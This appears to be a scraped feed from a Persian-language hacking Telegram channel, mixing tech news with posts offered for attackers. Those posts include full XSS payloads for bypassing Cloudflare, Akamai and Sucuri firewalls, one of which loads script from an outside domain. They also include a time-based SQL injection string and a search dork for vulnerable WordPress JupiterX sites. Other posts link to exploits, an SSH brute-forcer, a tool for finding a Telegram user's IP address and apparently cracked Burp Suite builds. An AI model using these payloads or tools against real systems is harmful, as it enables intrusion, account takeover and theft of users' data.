گروه Anti-mullah سازمان ثبت احوال رو هک کرده و به اطلاعات بیش از ۱۳۰ میلیون نفر دسترسی پیدا کرده .
ثبت احوال این موضوع رو تکذیب کرده.
#News
——————
0Day.Today
@LearnExploit
@Tech_Army
CloudFlare Bypass [XSS]
Payload :
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
آیس کیوب که کونه این حرفا نمیزاره معمولا، اینجوری جواب ایلان ماسک و داده 😂🤦♂
#fun
——————
0Day.Today
@LearnExploit
@Tech_Army
Secure Shell Bruteforcer — A faster & simpler way to bruteforce SSH server
Github
#SSH #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
An Akamai WAF bypass
kuromatae"><textarea/onbeforeinput=kuro='//domain.tld';import(kuro)%09autofocus%09x>
#Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-32233
Ubuntu 23.04 LPE exploit
Github
#exploit #linux #cve #LPE
——————
0Day.Today
@LearnExploit
@Tech_Army
#Exploit #Wordpress #JupiterX #Plugin
Wordpress JupiterX Core Plugin Unauthenticated Account Takeover Vuln
Dork : inurl: wp-content/plugins/jupiterx-core/
نکته: با پایتون 2.7 اجرا کنید در غیر این صورت با اررور مواجه میشید.
Shared By XP4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
onscrollend payload for Chrome and Firefox
<xss onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:50px;"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><span id=x>test</span></xss>
#payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Sucuri bypass payload
<s\Cr\ipt\>alert(document\.cookie)<\/s\Cr\ipt\>\;\/>
#bypass #payload
——————
0Day.Today
@LearnExploit
@Tech_Army
تلگرام از این پس یک شبکه اجتماعی است ، نه پیامرسان
جدیدترین بهروزرسانی تلگرام که از ساعاتی قبل در دسترس قرار گرفته، قابلیتهایی مثل استوری و کلوز فرندز را به این پلتفرم اضافه میکند.
یکی دیگر از قابلیتهای هیجانانگیز جدید تلگرام، امکان ارسال استوریها در قالب پست است. پستهای تلگرام طراحی مشابه اینستاگرام دارند.
تلگرام میگوید بزرگترین بهروزرسانی تاریخش را بهخود دیده است و اکنون پلتفرم متفاوتی محسوب میشود.
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
Dark Web 101 Anonymous and Secure Browsing 2023
Download
#Download
——————
0Day.Today
@LearnExploit
@Tech_Army
SQL injection payload : 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'
#payload #SQL
——————
0Day.Today
@LearnExploit
@Tech_Army
Cloudflare XSS protection bypass : "><Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="))>
#bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
kernel exploit factory
کالکشنی از اکسپلویت های کرنل لینوکس :
Github
#linux #kernel #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
اسم اکانت توییتر به X تغییر کرده ولی یوزر نیمش هنوز همون توییتره !
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
#Course #Free #OWASP #Web_Hacking
🔱 دوره رایگان OWASP
⚜️ مدرس : میثم منصف
HTTP (Part01) :
https://cafenode.ir/OWASP-FREE/01/c01.mp4
https://cafenode.ir/OWASP-FREE/01/c02.mp4
https://cafenode.ir/OWASP-FREE/01/c03.mp4
https://cafenode.ir/OWASP-FREE/01/c04.mp4
OS Command Injection (Part02):
https://cafenode.ir/OWASP-FREE/02/c01.mp4
https://cafenode.ir/OWASP-FREE/02/c02.mp4
https://cafenode.ir/OWASP-FREE/02/c03.mp4
https://cafenode.ir/OWASP-FREE/02/c04.mp4
https://cafenode.ir/OWASP-FREE/02/c05.mp4
https://cafenode.ir/OWASP-FREE/02/c06.mp4
Server Side Template Injection (Part03):
https://cafenode.ir/OWASP-FREE/03/c01.mp4
https://cafenode.ir/OWASP-FREE/03/c02.mp4
https://cafenode.ir/OWASP-FREE/03/c03.mp4
https://cafenode.ir/OWASP-FREE/03/c04.mp4
XSS - CSRF (Part04):
https://cafenode.ir/OWASP-FREE/04/c01.mp4
https://cafenode.ir/OWASP-FREE/04/c02.mp4
https://cafenode.ir/OWASP-FREE/04/c03.mp4
https://cafenode.ir/OWASP-FREE/04/c04.mp4
Live (Part05):
https://cafenode.ir/OWASP-FREE/05/c01.mp4
https://cafenode.ir/OWASP-FREE/05/c02.mp4
Server Side Request Forgery (Part06):
https://cafenode.ir/OWASP-FREE/06/c01.mp4
https://cafenode.ir/OWASP-FREE/06/c02.mp4
https://cafenode.ir/OWASP-FREE/06/c03.mp4
https://cafenode.ir/OWASP-FREE/06/c04.mp4
https://cafenode.ir/OWASP-FREE/06/c05.mp4
https://cafenode.ir/OWASP-FREE/06/c06.mp4
SQL Injection I (Part07) :
https://cafenode.ir/OWASP-FREE/07/c01.mp4
https://cafenode.ir/OWASP-FREE/07/c02.mp4
https://cafenode.ir/OWASP-FREE/07/c03.mp4
https://cafenode.ir/OWASP-FREE/07/c04.mp4
https://cafenode.ir/OWASP-FREE/07/c05.mp4
https://cafenode.ir/OWASP-FREE/07/c06.mp4
https://cafenode.ir/OWASP-FREE/07/c07.mp4
https://cafenode.ir/OWASP-FREE/07/c08.mp4
SQL Injection II (Part08) :
https://cafenode.ir/OWASP-FREE/08/c01.mp4
https://cafenode.ir/OWASP-FREE/08/c02.mp4
https://cafenode.ir/OWASP-FREE/08/c03.mp4
https://cafenode.ir/OWASP-FREE/08/c04.mp4
https://cafenode.ir/OWASP-FREE/08/c05.mp4
https://cafenode.ir/OWASP-FREE/08/c06.mp4
https://cafenode.ir/OWASP-FREE/08/c07.mp4
XML External Entity (Part09) :
https://cafenode.ir/OWASP-FREE/09/c01.mp4
https://cafenode.ir/OWASP-FREE/09/c02.mp4
https://cafenode.ir/OWASP-FREE/09/c03.mp4
https://cafenode.ir/OWASP-FREE/09/c04.mp4
https://cafenode.ir/OWASP-FREE/09/c05.mp4
https://cafenode.ir/OWASP-FREE/09/c06.mp4
https://cafenode.ir/OWASP-FREE/09/c07.mp4
https://cafenode.ir/OWASP-FREE/09/c08.mp4
https://cafenode.ir/OWASP-FREE/09/c09.mp4
https://cafenode.ir/OWASP-FREE/09/c10.mp4
Broken Authentication (Part10) :
https://cafenode.ir/OWASP-FREE/10/c01.mp4
https://cafenode.ir/OWASP-FREE/10/c02.mp4
https://cafenode.ir/OWASP-FREE/10/c03.mp4
https://cafenode.ir/OWASP-FREE/10/c04.mp4
https://cafenode.ir/OWASP-FREE/10/c05.mp4
API Security (Part11) :
https://cafenode.ir/OWASP-FREE/11/c01.mp4
https://cafenode.ir/OWASP-FREE/11/c02.mp4
https://cafenode.ir/OWASP-FREE/11/c03.mp4
https://cafenode.ir/OWASP-FREE/11/c04.mp4
https://cafenode.ir/OWASP-FREE/11/c05.mp4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today
@LearnExploit
@Tech_Army
Telegram: get the IP address of the interlocutor
Learn
#Telegram #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
در نسخه بتای تلگرام اگر شخصی با دستگاهی دیگر در اکانت شما لاگین کند، تلگرام با نمایش نوتیفیکیشن درون برنامهای به کاربر هشدار میدهد و کاربر میتواند از طریق همین نوتیفیکیشن، اجازه دسترسی جدید را مسدود کند.
#News #Telegram
——————
0Day.Today
@LearnExploit
@Tech_Army
A payload to bypass some WAF
<SvG><set%0Aonbegin%0A=%0aa=confirm;a%28%60xss%60)/x>
#Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
Burp Suite Version 2023.10.1
آموزش استفاده در فایل Readme گفته شده .
* نکته : برای اجرا شدن نیاز به Java ورژن 18 به بالا نیاز خواهید داشت . *
Pass : 311138
#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-38831
WinRAR 6.22 code execution PoC
Github
#exploit #CVE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
#Exploit #Wordpress #JupiterX #Plugin
Wordpress JupiterX Core Plugin Unauthenticated Account Takeover Vuln
Dork : inurl: wp-content/plugins/jupiterx-core/
Shared By XP4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
➖ 97 JSON tests for authentication EndPoints
🧾 API Security CheatSheet
🔽 Tap to Download Here
#API #Securiry #CheatSheet
➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
vulnerability checklist
This repo contain a lot of vulnerability checklist
1.AEM misconfiguration
2.Authentication
3.IDOR
4.Business Logic
5.jire vulnerability
6.register vulnerability
7.2FA bypassing
8.admin panal
9.exif vulnerability
10.cookie attack
11.reset password attack
12.Acount takeover checklist
13.403 bypass checklist
14.tips from twitter
15.tips from twitter p 2
16.Sql injection
17.xss
18.File Upload
19.rate limit
👑Linux Essential for Hackers
Download
#Download
——————
0Day.Today
@LearnExploit
@Tech_Army
Burp Suite Version 2023.8
آموزش استفاده در فایل Readme گفته شده .
* نکته : برای اجرا شدن نیاز به Java ورژن 18 به بالا نیاز خواهید داشت . *
Pass : 311138
#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
RIP twitter - 2006,2023 🖤🪦
در راستای تغییر برند توییتر , نام و لوگوی اپلیکیشن اندرویدی این شبکه اجتماعی به X تغییر پیدا کرد .
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
https://github.com/MrBlackZero/processinjection-via-syscall
فیض ببرید تولید ملی
#tools
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-28467
MyBB 1.8.33 User CP email persistent XSS
Github
#CVE #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army